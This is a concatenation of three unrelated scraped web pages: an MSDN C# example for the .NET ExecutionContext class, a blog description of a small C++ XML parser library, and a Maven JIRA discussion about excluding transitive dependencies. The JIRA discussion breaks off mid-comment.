ExecutionContext Class Manages the execution context for the current thread. This class cannot be inherited. Assembly: mscorlib (in mscorlib.dll). The following code example shows the use of members of the ExecutionContext class. using System; using System.Threading; using System.Security; using System.Collections; using System.Security.Permissions; using System.Runtime.Serialization; using System.Runtime.Remoting.Messaging; namespace Contoso { class ExecutionContextSample { static void Main() { try { Thread.CurrentThread.Name = "Main"; Console.WriteLine("Executing Main() in the primary application thread (\"{0}\").", Thread.CurrentThread.Name); FileDialogPermission fdp = new FileDialogPermission( FileDialogPermissionAccess.OpenSave); fdp.Deny(); // Capture the execution context containing the Deny. ExecutionContext eC = ExecutionContext.Capture(); // Suppress the flow of the execution context. Console.WriteLine("Suppress the flow of the execution context."); AsyncFlowControl aFC = ExecutionContext.SuppressFlow(); Console.WriteLine("Is the flow suppressed? " + ExecutionContext.IsFlowSuppressed()); Thread t1 = new Thread(new ThreadStart(DemandPermission)); t1.Name = "T1"; t1.Start(); t1.Join(); Console.WriteLine("Restore the flow."); aFC.Undo(); Console.WriteLine("Is the flow suppressed? " + ExecutionContext.IsFlowSuppressed()); Thread t2 = new Thread(new ThreadStart(DemandPermission)); t2.Name = "T2"; t2.Start(); t2.Join(); // Remove the Deny. CodeAccessPermission.RevertDeny(); // Capture the context that does not contain the Deny. ExecutionContext eC2 = ExecutionContext.Capture(); // Show that the Deny is no longer present. Thread t3 = new Thread(new ThreadStart(DemandPermission)); t3.Name = "T3"; t3.Start(); t3.Join(); // Use the Run method to execute DemandPermission in // the captured context, where Deny is active. The // demand fails. ExecutionContext.Run(eC, CallbackInContext, null); Console.WriteLine(); // Demonstrate the execution context methods. ExecutionContextMethods(); Console.WriteLine("Demo is complete, press Enter to exit."); Console.Read(); } catch (Exception e) { Console.WriteLine(e.Message); } } // Execute the Demand. static void DemandPermission() { try { Console.WriteLine("\nIn thread {0} executing a Demand for " + "FileDialogPermission.", Thread.CurrentThread.Name); new FileDialogPermission( FileDialogPermissionAccess.OpenSave).Demand(); Console.WriteLine("Successfully demanded " + "FileDialogPermission."); } catch (Exception e) { Console.WriteLine("Demand for FileDialogPermission failed with {0}.", e.GetType()); } } static void ExecutionContextMethods() { // Generate a call context for this thread. ContextBoundType cBT = new ContextBoundType(); cBT.GetServerTime(); ExecutionContext eC1 = ExecutionContext.Capture(); ExecutionContext eC2 = eC1.CreateCopy(); Console.WriteLine("\nThe hash code for the first execution " + "context is: " + eC1.GetHashCode()); // Create a SerializationInfo object to be used for getting the // object data. SerializationInfo sI = new SerializationInfo( typeof(ExecutionContext), new FormatterConverter()); eC1.GetObjectData( sI, new StreamingContext(StreamingContextStates.All)); LogicalCallContext lCC = (LogicalCallContext)sI.GetValue( "LogicalCallContext", typeof(LogicalCallContext)); // The logical call context object should contain the previously // created call context. Console.WriteLine("Is the logical call context information " + "available? " + lCC.HasInfo); } static void CallbackInContext(object state) { // The state is not used in this example. DemandPermission(); } } // One means of communicating between client and server is to use the // CallContext class. Calling CallContext effectivel puts the data in a thread // local store. This means that the information is available to that thread // or that logical thread (across application domains) only. [Serializable] public class CallContextString : ILogicalThreadAffinative { String _str = ""; public CallContextString(String str) { _str = str; Console.WriteLine("A CallContextString has been created."); } public override String ToString() { return _str; } } public class ContextBoundType : ContextBoundObject { private DateTime starttime; public ContextBoundType() { Console.WriteLine("An instance of ContextBoundType has been " + "created."); starttime = DateTime.Now; } [SecurityPermissionAttribute(SecurityAction.Demand, Flags = SecurityPermissionFlag.Infrastructure)] public DateTime GetServerTime() { Console.WriteLine("The time requested by a client."); // This call overwrites the client's // CallContextString. CallContext.SetData( "ServerThreadData", new CallContextString("This is the server side replacement " + "string.")); return DateTime.Now; } } } /* This code produces output similar to the following: Executing Main() in the primary application thread ("Main"). Suppress the flow of the execution context. Is the flow suppressed? True In thread T1 executing a Demand for FileDialogPermission. Successfully demanded FileDialogPermission. Restore the flow. Is the flow suppressed? False In thread T2 executing a Demand for FileDialogPermission. Demand for FileDialogPermission failed with System.Security.SecurityException. In thread T3 executing a Demand for FileDialogPermission. Successfully demanded FileDialogPermission. In thread Main executing a Demand for FileDialogPermission. Demand for FileDialogPermission failed with System.Security.SecurityException. An instance of ContextBoundType has been created. The time requested by a client. A CallContextString has been created. The hash code for the first execution context is: 58225482 Is the logical call context information available? True Demo is complete, press Enter to exit. */ System.Threading.Execution.
https://msdn.microsoft.com/en-us/library/system.threading.executioncontext(v=vs.90)
CC-MAIN-2017-09
en
refinedweb
Business Intelligence TIMi added value This project started from his frustration that he could not find any simple, portable XML Parser to use inside all my projects (for example, inside the award-winning TIMi software suite created by the Business-Insight company). Let's look at the well-known Xerces C++ library: The complete Xerces project is 53 MB! (11 MB compressed in a zipfile). In 2003, He was developping many small tools. He was using XML as standard for all my input/ouput configuration and data files. The source code of his small tools was usually around 600KB. In these conditions, don't you think at 53MB to be able to read an XML file is a little bit "too much"? So he created his own XML parser. His XML parser "library" is composed of only 2 files: a .cpp file and a .h file. The total size is 104 KB Here is how it works: The XML parser loads a full XML file in memory, it parses the file and it generates a tree structure representing the XML file. Of course, you can also parse XML data that you have already stored yourself into a memory buffer. Thereafter, you can easily "explore" the tree to get your data. You can also modify the tree using "add" and "delete" functions and regenerate a formatted XML string from a subtree. Memory management is totally transparent through the use of smart pointers (in other words, you will never have to do any new, delete, malloc or free)("Smart pointers" are a primitive version of the garbage collector in Java). To the best of his knowledge, there exists no other "non-validating C++ XML parser" that is as simple and as powerfull. Well Tiny XML is pretty powerful too! Here are the characteristics of the XMLparser library: Non-validating XML parser written in standard C++ (DTD's or XSD's informations are ignored). Cross-plateform: the library is currently used every day on Solaris, Linux (32bit and 64bit) and Windows to manipulate "small" PMML documents (10 MB). The library has been tested and is working flawlessly using the following compilers: gcc (under linux, Mac OS X Tiger and under many unix flavours), Visual Studio 6.0, Visual Studio .NET (under Windows 9x,NT,2000,XP,Vista,CE,mobile), Intel C/C++ compiler, SUN CC compiler, C++ Borland Compiler. The library is also used under Apple OS, iPhone/iPad OS, Amiga OS, QNX and under the Netburner plateform. To the best of my knowledge, i think that all plateforms are now supported. The parser builds a tree structure that you can "explore" easily (DOM-type parser). The parser can be used to generate XML strings from subtrees (it's called rendering). You can also save subtrees directly to files (automatic "Byte Order Mark"-BOM support). Modification or "from scratch creation" of large XML tree structures in memory using funtions like addChild, addAttribute, updateAttribute, deleteAttribute,... It's SIMPLE: no need to learn how to use dozens of classes: there is only one simple class: the 'XMLNode' class (that represents one node of the XML tree). Very efficient (Efficiency is required to be able to handle BIG files): The string parser is very efficient: It does only one pass over the XML string to create the tree. It does the minimal amount of memory allocations. For example: it does NOT use slow STL::String class but plain, simple and fast C malloc 's. It also allocates large chunk of memory instead of many small chunks. Inside Visual C++, the "debug versions" of the memory allocation functions are very slow: Do not forget to compile in "release mode" to get maximum speed. The "tree exploration" is very efficient because all operations on the 'XMLNode' class are handled through references: there are no memory copy, no memory allocation, never. The XML string rendering is very efficient: It does one pass to compute the total memory size of the XML string and a second pass to actually create the string. There is thus only one memory allocation and no extra memory copy. Other libraries are slower because they are using the string concatenation operator that requires many memory (re-)allocations and memory copy. In-memory parsing Supports XML namespaces Very small and totally stand-alone (not built on top of something else). Uses only standard Easy to integrate into you own projects: it's only 2 files! The .h file does not contain any implementation code. Compilation is thus very fast. Robust. Optionnally, if you define the C++ prepocessor directives STRICT_PARSING and/or APPROXIMATE_PARSING, the library can be "forgiving" in case of errors inside the XML. He has tried to respect the XML-specs given at: Fully integrated error handling : The string parser gives you the precise position and type of the error inside the XML string (if an error is detected). The library allows you to "explore" a part of the tree that is missing. However data extracted from "missing subtrees" will be NULL. This way, it's really easy to code "error handling" procedures. Thread-safe (however the global parameters "guessUnicodeChar" and"strictUTF8Parsing" must be unique because they are shared by all threads). Full Native Supports for a wide range of character sets & encodings: ANSI (legacy) / UTF-8 / Shift-JIS / GB2312 / Big5 / GBK. Under Windows, Linux, Linux 64 bits & Solaris, they have additionnaly: Unicode 16bit / Unicode 32bit widechar characters support that includes: For the unicode version of the library: Automatic conversion to Unicode before parsing (if the input XML file is standard ansi 8bit characters). For the ascii version of the library: Automatic conversion to legacy or UTF-8 before parsing (if the input XML file is unicode 16 or 32bit wide characters). The XMLParser library is able to handle successfuly chinese, japanese, cyrilic and other extended characters thanks to an extended UTF-8 encoding support, Shift-JIS (japanese) and to GB2312/Big5/GBK encoding support (chinese) (see this UTF-8-demo that shows the characters available). If you are still experiencing character encoding problems, he suggest you to convert your XML files to UTF-8 using a tool like iconv (precompiled win32 binary). Transparent memory management through the use of smart pointers. Support for a wide range of clearTags that are containing unformatted text: {![CDATA[ ... ]]}, {!-- ... --}, {PRE} ... {/PRE}, {!DOCTYPE ... } Unformatted texts are not parsed by the library and can contain items that are usually 'forbidden' in XML (for example: html code) Support for inclusion of pure binary data (images, sounds,...) into the XML document using the four provided ultrafast Base64 conversion functions. The library is under the Aladdin Free Public License(AFPL). A small tutorial Let's assume that you want to parse the XML file "PMMLModel.xml" that contains: ( all < replace by { and all > replace by } ) {?xml version="1.0" encoding="ISO-8859-1"?> {PMML version="3.0" xmlns="" xmlns:xsi=""} {/RegressionTable} {/RegressionModel} {/PMML} Let's analyse line by line the following small example program: #include #include #include "xmlParser.h" int main(int argc, char **argv) { // this open and parse the XML file: XMLNode xMainNode=XMLNode::openFileHelper("PMMLModel.xml","PMML"); // this prints " XML // this prints a formatted ouput based on the content of the first "Extension" tag of the XML file: char *t=xMainNode.getChildNode("Extension").createXMLString(true); printf("%s\n",t); free(t); return 0; }
http://younsi.blogspot.com/2011/11/small-simple-cross-platform-free-and.html
CC-MAIN-2017-09
en
refinedweb
Necessary for benchmarks. This is currently the most needed opcode reported by abort messages in v8 & sunspider test suite when they are executed with '--ion -n' flags. Created attachment 584358 [details] [diff] [review] Implement JSOP_THIS Comment on attachment 584358 [details] [diff] [review] Implement JSOP_THIS Review of attachment 584358 [details] [diff] [review]: ----------------------------------------------------------------- JSOP_THIS is unfortunately more complicated - see ComputeThis(). The logic is something like: * If |this| is an object, return |this|. * If |this| is null or undefined, |this| is globalObj->thisObject() * If |this| is a primitive, return js_PrimitiveToObject(this) So any time |this| is used where we don't already know that |this| has been computed, we need to replace it with a new SSA name. In this case it's okay to use the MIR node for |this| to determine whether |this| is already computed. One option is to have a ComputeThis(Value) -> Value instruction that has a guard, and an out-of-line path for returning the new |this|. With TypeInference we can also determine the type ComputeThis will return (however there wouldn't be a type barrier, so we'd have to manually unbox). Created attachment 585484 [details] [diff] [review] Implement JSOP_THIS Specialize this with type inference and compile JSOP_THIS only if the type is an object. Otherwise, abort the compilation with a message. Comment on attachment 585484 [details] [diff] [review] Implement JSOP_THIS Review of attachment 585484 [details] [diff] [review]: ----------------------------------------------------------------- ::: js/src/ion/IonBuilder.cpp @@ +362,5 @@ > // -- ResumePoint(v0) > // > // As usual, it would be invalid for v1 to be captured in the initial > // resume point, rather than v0. > + current->add(actual); Whoops, good catch. @@ +3004,5 @@ > +{ > + // initParameters only initialized "this" after the following check, make > + // sure we can safely access thisSlot. > + if (!info().fun()) > + return false; Should this be an abort? Or is this an error? (As written it'll be OOM) @@ +3011,5 @@ > + MDefinition *thisParam = current->getSlot(info().thisSlot()); > + > + if (thisParam->type() != MIRType_Object) { > + IonSpew(IonSpew_Abort, "Cannot compile this, not an object."); > + return false; Instead: return abort("... otherwise this will act as OOM. (In reply to David Anderson [:dvander] from comment #6) > @@ +3004,5 @@ > > +{ > > + // initParameters only initialized "this" after the following check, make > > + // sure we can safely access thisSlot. > > + if (!info().fun()) > > + return false; > > Should this be an abort? Or is this an error? (As written it'll be OOM) I think this should be an assertion, because the bytecode is badly produced. So I just removed the check as the assertion is already done by "info().thisSlot()". (forgot reviewer, sorry) *** Bug 713855 has been marked as a duplicate of this bug. ***
https://bugzilla.mozilla.org/show_bug.cgi?id=701961
CC-MAIN-2017-09
en
refinedweb
I am having problems figuring out how to get the results from the strings and then give myself the option to sort through them alphabetically (or numerically). I have the code to the point where it shows the input data but don't know where to go from there. I'm fairly new to java so I don't even know if I'm doing the first part right. I have looked in to sort options with Arrays but am not to sure how to use them (or if I have done it right to allow myself to use them). Any help would be appreciated. Below is a copy of my code. The questions I am trying to solve is "Your program should then use a menu that allows the user to display, search and exit. Display should display the list of the entries, sorted by last name, first name, or birth-date as requested by the user. Search should search for a specific entry by a specific field (last name, first name or birth-date) as requested by the user." import javax.swing.JOptionPane; public class Program2 { //Loop # public static void main(String [] args) { int Runs; do{ String runQuestion = JOptionPane.showInputDialog(null, "Number of patients to enter in? (1-2)", "Total # Of Patients", JOptionPane.QUESTION_MESSAGE); Runs = Integer.parseInt(runQuestion); if( Runs < 1 || Runs > 2) { //Small test numbers for now JOptionPane.showMessageDialog(null, "Please pick a number between 1 and 2", "Wrong Number Chosen", JOptionPane.INFORMATION_MESSAGE); } } while(Runs < 1 || Runs > 2); Questions(Runs); } //Data Gathering Questions public static void Questions(int Runs) { for(char index = 0;index < Runs;index ++) { //Questions String firstName = JOptionPane.showInputDialog(null, "Patients First Name?", "First Name", JOptionPane.QUESTION_MESSAGE); String lastName = JOptionPane.showInputDialog(null, "Patients Last Name?", "Last Name", JOptionPane.QUESTION_MESSAGE); String dateBirth = JOptionPane.showInputDialog(null, "Patients Date of Birth?", "DOB", JOptionPane.QUESTION_MESSAGE); String firstSort = String firstName; //Data Table print list System.out.println(firstName + " " + lastName + " " + dateBirth); } } }
https://www.daniweb.com/programming/software-development/threads/383948/display-search-and-exit-string-inputs
CC-MAIN-2017-09
en
refinedweb
So I wrote some stuff about traits: =). I'm opening this thread to talk about the post and any questions that may arise. I hope to be writing more posts covering other things; I'll re-use the thread in that case. To elaborate on my pithy reddit comment: Isn't your notion of equality through normalization equivalent to Homotopy Type Theory's Univalence Axiom, which treats equality and equivalence as...equivalent? While you are approaching things from a different foundation, I suspect that some implications of the univalence axiom are relevant. Your parallel to LLVM IR brings to mind the issue of quality error messages. LLVM proper does not generate any errors or warnings; they all come from the language front-end. In the case of Clang, this leads to a fair bit of duplicated functionality such as control flow graphs and dominator trees which are computed both in Clang and LLVM. LLVM can't produce good diagnostics because it is working on a lower level representation, and it is not always clear if a construct comes directly from user code or a previous transformation. For example, some Clang warnings are disabled for code that results from expanding a preprocessor macro, and LLVM has no idea what the preprocessor is. It's important that a type checker can give better error messages than "No!", so I think it is worth considering early on how such a solver might communicate with the user. As an aside, LLVM can produce one error: "Ran out of registers during register allocation". It means that you wrote inline assembly with a set of operand constraints that the register allocator couldn't solve. Clang can't type-check the constraints early because the formal definition of correct inline asm is "whatever works", and it depends on many obscure code generation flags. It's not a great user experience. The relationship between the IR and the source code seems much more direct than in the case of LLVM IR. For example each impl's well-formedness corresponds to one Horn clause, and each bound it depends on is one predicate. In fact, because this is specifically an IR for typechecking, the fundamental primitive is really a representation of a potential type error. Its an important thing to keep in mind when designing the system though. Very nice! Having official formal rules about the trait system should be a great starting point for reasoning about its abstract properties, and a stand-alone reference implementation may even be amenable to program verification - certainly more than any part of rustc itself. Regarding equality modulo reduction (or "computation"), that would be the standard definitional/judgemental equality in Martin-Löf type theory. A quick example in Lean: class Clone (Self : Type) := -- some part of Lean gets confused if you don't use the class parameters at all (clone : Self → Self) instance : Clone ℕ := { clone := id } class Iterator (Self : Type) := (Item : Type) (next : Self → option (Self × Item)) structure IntoIter (A : Type) : Type instance (A : Type) : Iterator (IntoIter A) := { Item := A, next := λ x, none } structure Enumerate (T : Type) : Type -- `[Iterator T]` will be resolved by typeclass resolution instance (T : Type) [Iterator T] : Iterator (Enumerate T) := { Item := ℕ × Iterator.Item T, next := λ x, none } -- we can explicitly ask things to be reduced... eval Clone (Iterator.Item (IntoIter ℕ)) -- "Clone ℕ" -- or rely on implicit reduction, such as during typeclass resolution def f (it : Iterator.Item (IntoIter ℕ)) := Clone.clone it (or play with it here) Now, if you also want propositional equalities to be respected, your type theory must be extensional, such as the one in NuPRL. Which I know absolutely nothing about. If you are stuck with an intensional one.. well, you'll have to get creative. Lean does, however, feature a novel implementation of congruence closure in its proof automation. For a nice overview over the different kinds of equality, see also this article. Ah, I long had a nagging suspicion that the (current) MIR, as a core language for the perhaps the operational semantics of Rust, was only half the battle, but I struggled (and still struggle, I'm not at all sure "operational semantics" is what I'm looking for) to express that thought clearly. I'm glad @nikomatsakis evidently agrees, and a solution is on the way! As an aside, I’d be curious to know if anyone has suggestions for related work around this area of “customizable equality”. In particular, I’m not aware of logic languages that have to prove goals to prove equality Indeed, as @tupshin mentioned, this topic is covered by Homotopy Type Theory where type equality is the real cornerstone. I am strongly advising you to have a look. By the way, the book is freely distributed on the official site: I think that the encouragements to look at Homotopy Type Theory (HoTT) are well-meaning but rather off-topic. What you are looking for for associated types is type-level computation, in a form that has been formalized in various ways in programming language theory (for example ML module system's research uses singleton types to compute with type definitions) and is essentially unrelated to the higher-dimensional nature of HoTT. Equality in general is a deep problem in type theory, and HoTT has a lot of exposure right now, so it is natural for people to think of a relation, but I don't think there is any here. (In technical terms, F-omega already has a type-equality relation in its type system that does type-level computation, while it doesn't have any notion of propositional equality.) On the other hand, my comment on reading the blog post was that there was a bit too much Prolog and a bit too little type theory, in the following sense: you are not only solving a proof search problem, you are building a program fragment that has computational meaning -- the execution behavior of your program depends on the fragment fragment that is inferred during trait elaboration By elaboration, I am referring to the idea of transforming the source code that people write into a more explicit form in which the calls to trait-bound functions are replaced/enriched/annotated with the path of the specific implementation of the function that is actually going to run, and calls to methods with trait assumptions on their generic parameters are enriched/annotated with an extra argument carrying the specific implementation of the trait for the call's instance. (This does not mean that trait dispatch has to be implemented this way in practice; you can always explain the specialization as inlining and specialization of these extra explicit arguments.) In particular, while the code before the elaboration does not satisfy the type erasability property (if you erase all information about types, you cannot execute the program anymore), the explicited program after elaboration has a type-erased semantics that is faithful to the language semantics. Understanding this transformation pass is important because (1) having an intermediate form that permits type erasure is an interesting property of your language (it tells you the minimum information a programmer needs to understand to accurately predict program execution) and (2) this intermediate form is a good way to think about human-program interactions in an IDE: it is precisely what you want to show (under some nice syntax) when a programmer wonders "what is going to happen with this trait-bound call here?", and understanding the syntax of this elaborated forms also helps you write better error messages when elaboration fails (because there is an ambiguity, for example). If you are lucky, you can design this elaboration in such a way that the post-elaboration program are expressed in exactly the same syntax as the pre-elaboration program that users wrote. This property trivially holds of Scala's implicit parameters (an implicit parameter is just a value/term that the user could have written themselves), but it is a bit less obvious of Haskell's type classes or Rust's traits. Using the Haskell syntax that I am more familiar with, you could elaborate something like: class Eq a where eq :: a -> a -> Bool instance EqInt where eq n1 n2 = ... instance Eq a => Eq (List a) where eq [] [] = True eq (x:xs) (y:ys) = eq x y && eq xs ys eq _ _ = False discr :: Eq a => a -> a -> Int discr x y = if eq x y then 1 else 0 assert (discr [1] [2] == 0) into the more explicit transformed program type eq a = (a -> a -> bool) eqInt :: eq Int = ... eqList :: eq a -> eq (List a) eqList eqA [] [] = True eqList eqA (x:xs) (y:ys) = eqA x xs && eqList eqA xs ys eqList eqA _ _ = False discr :: eq a -> a -> a -> Int discr eqA x y = if eqA x y then 1 else 0 assert (discr (eqList eqInt) [1] [2] == 0) Notice that:- a class/trait becomes the type of a value returning its operation(s): the class Eq a becomes the type eq a of comparison functions- a ground instance (Int is in the class Eq) is turned into a value of that type, eq Int- a conditional instance (if a is in the class Eq, so are lists of a) becomes a function from values of type eq a to values of type eq (List a)- the call discr [1] [2] in the source version has a behavior that depends on "which definition of the equality will be chosen". In the explicit version, we can easily describe which definition has been chosen by a source term: (eqList eqInt). I could show this to the user; if there was a conflict with two possible definitions, I could show both sides to explain the conflict. Eq a eq a Int Eq eq Int a eq (List a) discr [1] [2] (eqList eqInt) The prolog rules presented in the blog post explain whether there exists a solution to this elaboration problem, but not what the solution is. There are two ways to describe the relation between these two questions: eq (List Int) Of course, none of these two views is intrisically better than the other: they are both perfectly correct, and it is interesting to keep both perspectives in mind. Which one matters depends on the specific problem you are asking about the system you are studying. (I think this is important to point out because the original blog post is not balanced in this respect, it only presents the logic-programming view of the problem.) Here are some reasons why I think also working out the type-theroetic views (that elaboration witnesses are terms that we are doing a search for) is important: Eq Int Ord Int => Eq Int If you see trait search as elaboration into an existing logic, you will be able to apply existing proof search techniques exactly unchanged, but every desirable property of your design will have to be checked through the encoding from types to logic propositions, and from logic proof terms to programs or elaboration witnesses. If you see trait search as term search in your existing type system, you will have to re-interpret existing proof search methods inside a slightly different setting, but the terms and the types manipulated will be those that users know and think about. You need to combine both views to productively think about the problem. Heh, I'm glad you think so, because to be honest I know absolutely nothing about homotopy type theory and I don't relish reading into another big area of work. Yes, so -- to start, I agree with everything you wrote, for the most part. =) I started out taking the "logic-centric" view that you described, where the proof tree defines the program semantics. But I've since shifted gears into a different approach. The key is that, in Rust, every (monomorphized) function definition has a unique type. This is true of closures (of course), but also of function items. These types are zero-sized, but they can be "reified" into a function pointer. You can see that in the following program: use std::mem; fn foo() { } fn main() { let f = foo; println!("{}", mem::size_of_val(&f)); // prints 0 } The only time that it trait resolution affects program semantics is basically when it decides what code will execute. For example, when I call x.clone(), we will take the (monomorphized) type of x (let's call it X) and then find the appropriate version of clone for X. In my view, this is just associated type normalization. x.clone() x X clone In other words, you can view the impl of Clone as supplying a (special) associated type clone which is guaranteed to point to one of these unique function types after normalization (this could be modeled as a normal associated type with a further bound, if you cared to do so). My point is that "resolving" x.clone() to a specific bit of code, in this view, is basically equivalent to normalizing the associated type <X as Clone>::clone (where X is the type of x). Clone <X as Clone>::clone So let's say there is a normalization predicate: <X as Clone>::clone ==> T (as, indeed, there is). In this case, it doesn't matter what the proof tree is; if I can prove the normalization judgement, and because I know that T will be some unique function type, I have figure out what code to call -- I just have to reify T into a function pointer. Of course all of this relies on coherence to ensure that, indeed, every normalization has a specific and unique outcome. <X as Clone>::clone ==> T T (For trait objects, the way I view is that there is an (implicit) impl of Trait for the type Trait. That implementation is fixed to extract a pointer out of a vtable and call it.) Trait What this means for the proof search is that we don't mind if there are multiple proof trees, so long as they all prove the same judgement (i.e., they all normalize <X as Clone>::clone to the same type T). But we have to be very careful for those cases where we infer some parts of the judgement from others. As an example, if you have only impl Foo for i32, and you ask us to prove ?T: Foo, we will infer that (a) it is true and (b) ?T = i32 must hold. It would be bad if we did that even in the case where there existed more impls, since then we'd be arbitrarily deciding on a semantics for you. But in any case this process of inferring bits of the judgement is exactly the elaboration you were talking about, I believe. impl Foo for i32 ?T: Foo ?T = i32 Does that make sense to you? So Rust's traits have always felt less type-theoretic to me too. I think a big reason is that in Haskell dictionaries often do get passed around so the proof tree does matter computationally even if coherence guarantees that the evaluated value is unique. Now, I'd like to really be able to explicitly work with vtables and existential types in Rust someday, but until then, yes, the approaches here will work. BTW, the conversation for is very interesting and somewhat tangentially relevant, and I do recommend it. @nikomatsakis [hope this isn't veering off-topic too much.] The function types approach does work, but IMO ultimate doesn't feel completely satisfactory because working with singleton-type proxies alone is quite indirect. Thinking back to what if every function singleton type inhabited a trait like trait Fn<'a, Params, Ret> where Self::Size = 0 { const ptr: &'a TrueFn<Params, Ret>; } Where 'a would always be 'static today, and TrueFn is a custom Meta = () unsized type. One thing I like about this is it puts tupled parameter types "at the root", which I think is good for any future variadics work. 'a 'static TrueFn Meta = () Not sure what to do for unsafety and ABI, but heavy solutions do exist (e.g. Haskell's data promotion for an ABI enum). So Rust's traits have always felt less type-theoretic to me too Actually, logic programming can be very type-theoretic. Twelf is a great example, in this language propositions are literally types and programming is specifying types. See Introduction to Twelf and the Twelf wiki for more details. After further reflection (and a lot of experimentation) on Rust's trait system I believe its logic ends up being very similar to that made possible by Scala's Path Dependent Types, and that there are enough similarities that it would be worth reviewing as some very relevant prior art.
https://internals.rust-lang.org/t/blog-series-lowering-rust-traits-to-logic/4673
CC-MAIN-2017-09
en
refinedweb
Details - Type: New Feature - Status: Reopened - Priority: Major - Resolution: Unresolved - Affects Version/s: None - Fix Version/s: needing-scrub-3.4.0-fallout - - Labels:None Description I depend on some libraries, which in turn depend on something (which in turn depend on something) that I don't want, because I declare some other artifact in my pom.xml. A concrete example: I don't want that the artifact "xerces" is imported in my project because I declare to depend on "xercesImpl" which ships newer libraries but with the same namespaces. I guess I would need an "exclude transitive dependency at all", either globally or from this and that artifact. I saw the <exclusions> tag, but it forces me to be very verbose and have exact control on what is required by a dependency. Issue Links - is duplicated by - - - - - - - is related to - - is superceded by - - relates to - - - - - mentioned in - Activity - All - Work Log - History - Activity - Transitions Adding another possibly featured way to configure: - disable all transitive deps for certain scopes (e.g.: I'ld like transitive deps marked for 'runtime' and 'compile', but not for 'test') The squeakiest tire get the oil first : That would be indeed a much wanted feature. Gilles Gilles Tabary Hi,! The main issue it that it can't be specified in the current pom model (4.0.0) and updates to the pom model require the next version aka 2.1. There is a way to detect these creeping in, in dependency:analyze-dep-mgt and in the next enforcer release, there will be a rule that can fail the build when any excluded dependencies are found in the build. I don't know, I will miss all of the late nights and long weekends I spend analyzing the dependency tree trying to get rid of one stupid JAR file that causes the application not to run properly. What will I do with all my extra time? Wow, maybe I can actually DEVELOP something. I can just agree to others here, this is indeed a VERY important feature. It would ease the development a lot. As if you currently have such a bogus dependency you'll have to copy and paste every possible exclusion to every dependency. This is really ugly and costs a lot of time. I'm currently also suffering from the lack of this feature and would be extremely grateful to see this one added Cheers, C It seems to me that the original problem would be solved better by artifact substitution or aliasing rather than more exclusions. e.g if you want to use something reasonable such as slf4j to imitate commons logging usage you want to replace any dependency on commons-logging with one on jcl-over-slf4j. Similarly you might want to swap spec implementations, say to use the geronimo ones no matter which copies the original projects were built against, or use geronimo's activation implementation instead of sun's. This isn't quite the same as what osgi gives you but is quite powerful. You are right David, that would solve the original problem in an elegant way. Is this an existing feature I missed or should we submit a new jira issue for this? Aliasing would be nice. But I would also like to be able to specify that, for example, junit-3.8.1 should NEVER be downloaded and never be resolved as a dependency for my projects. I don't ever want junit-3.8.1 and junit-4.5 to both be in the same classpath. This just became a total showstopper with SpringSource effectively cloning the entire maven dependency set in their "enterprise" repo. I know that's not maven's fault, but both global exclusions (e.g. as protections again known bad poms) and aliasing (to always substitute slf4j for clogging) would really fix a lot of problems that this has caused. That's a lovely development. If you use Nexus, you can control which artifacts come from a given repo so you can prevent the springsource repo from polluting your team. There's nothing that can be done inside maven for global exclusions until 3.0 since it requires a model change in the pom. It's a sad thing that this will never be available for backports because the pom model cannot be changed.. Pierre, The pom format can't be changed until Maven 3.x. The alphas of 3.x are close by, but currently it's focused on 2.x compatibility with the new code and a process to handle pom model changes hasn't been built yet. Could this not be achieved via a new scope? I'm thinking: <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.1.1</version> <scope>excluded</scope> </dependency> Semantics would be that any artifactId declared in this way would be guaranteed not to be on either the test or main runtime or compile time classpath, and neither would any of its transitive dependencies, and its transitive dependencies would not be added to the declaring pom's transitive dependencies, regardless of version number or where in the transitive dependency tree it occurred. (This is effectively how people are achieving the desired effect already, by using scope "provided" - but that has the negative that the artifact and all of its transitive dependencies are still on the compile classpath raising the possibility of errors only discovered at runtime.) Hi Robert, You are right to observe that the provided scope has the inconvenience of placing the thus "excluded" artifact on the project's class path within the IDE, in particular Eclipse. However, as far as I know, the artifact is effectively excluded during build time by Maven. The provided scope is unsatisfactory during development time within the IDE, i.e. within Eclipse or IDEA. Maven definitely makes provided scope dependencies available at compile time - otherwise no library compiled against the servlet api would compile. A good example in the logging context would be someone who desired to use slf4j-over-log4j instead of log4j. Making log4j itself have scope provided would have the desired runtime behaviour of excluding the log4j jar if any transitive dependency brought it in, thereby preventing any non-determinate behaviour depending on which version of the log4j classes the classloader loaded first; however, at compile time Maven would happily be able to compile code dependent on classes that are included in log4j but are not in slf4j-over-log4j, and the user would only discover the problem at runtime. D'oh! Thanks for the explanation. Hello, I gave a go at this new feature following Rob Elliot's idea of using a <scope>excluded</scope> . And it works a treat for me. I uploaded the maven changes + integration test as patches. Thanks, Jean-Noel Hi, I didn't review your patch thus I won't judge about it. I really dislike this idea to continue to play with the lake of control in old maven versions which will ignore things they don't know in the POM. For me such change must be done only in a new POM version and with all mechanisms to be used with previous and future maven versions. Did you test such POM with Maven 3.0.x ? I think it at least display a warning if there is a scope it doesn't know (I don't remember but perhaps it breaks the build). And when a maven version ignores it, what does it do ? It uses the compile scope ? #fail in that case, instead of excluding it, you explicitely add it (transitively) Cheers Hello, BTW the <scope>excluded</scope> solution doesn't really helps in any way to deal easily with excludes. It looks like a hard-wired work-around. Adding a <transitive>true|false</transitive> or a <handling>transitive|simple</handling> (maybe better to allow further unforeseen improvements) both at the level of all <dependencies></dependencies> or at the level of a single <dependency></dependency> wouldn't be hard to deal with (just a test to trigger the transitive search of the underlying tree) and would achieve the expected result. I thought that the pom model was supposed to evolve from version 3.0.x on? Regards. Pierre-Antoine. @Arnaud Sorry, I went for the easiest to implement. If you do not like it this way, fair enough, we can do it otherwise. I originally started with such change to the pom.xml: <project> <dependencies> <exclusions> <exclusion> <groupId>com.mycompany</groupId> <artifactId>myproject</artifactId> <classifier>optional</classifier> </exclusion> </exclusions> <dependency> ... </dependency> ... </dependencies> ... </project> No I did not test with older versions of maven. I saw that maven-3 has got some validation mechanism for the scope so I think it would reject it. For maven-2 I need to check. Indeed the following scenario would be catastrophic: "And when a maven version ignores it, what does it do ? It uses the compile scope ? #fail in that case, instead of excluding it, you explicitely add it (transitively)". I will test both of these and let you know. Same, it does not really matter to me which mechanism you prefer to use. Just tell me how you want it to look in the pom.xml and I can have a look at doing it. Jean-Noel Hi Arnaud, You were right, using <scope>excluded</scope> with older versions of maven (I used v2.2.1) gives the opposite result to what is intended. The excluded scope is ignored and replaced with a compile scope. How do you want to proceed now? I suppose we now need to do a pom.xml format change. If I understood correctly , this is scheduled for maven 3.1. Do you want to go for the solution I 